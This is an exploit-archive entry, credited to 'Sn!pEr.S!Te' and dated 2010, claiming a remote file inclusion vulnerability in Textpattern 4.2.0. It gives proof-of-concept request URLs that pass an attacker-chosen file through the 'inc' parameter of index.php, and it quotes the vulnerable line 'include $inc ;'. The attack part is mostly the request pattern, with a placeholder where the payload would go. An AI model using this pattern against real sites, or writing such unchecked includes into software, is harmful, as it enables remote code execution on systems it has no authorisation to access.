id: 13899
date: 08/29/2010
title: Textpattern RFI Vulnerability
author: Sn!pEr.S!Te
cves: 

=============================
Textpattern RFI Vulnerability
=============================

# Textpattern ( index.php )
# --------------------------------------------------------------
# [+] Author : Sn!pEr.S!Te Hacker
# [+] Email : Sniper-site@HoTmaiL.Com
# [+] Inj3ct0r Team Hacker #
# [+] 28-8-2010
# [+] Script : Programs » Textpattern 
# [+]Version: [4.2.0] #
# [+] Download:http://textpattern.com/download
 ---------------------------------------------------------------
-=[ exploit ]=-
 
 
http://localhost/Textpattern/index.php?inc= [inj3ct0r RFI]
   
http://127.0.0.1/Textpattern/index.php?inc= [inj3ct0r RFI]
----------------------------------------------------------------------
Line : 141
 
code : include $inc ;



#  0day.today [2023-03-27]  #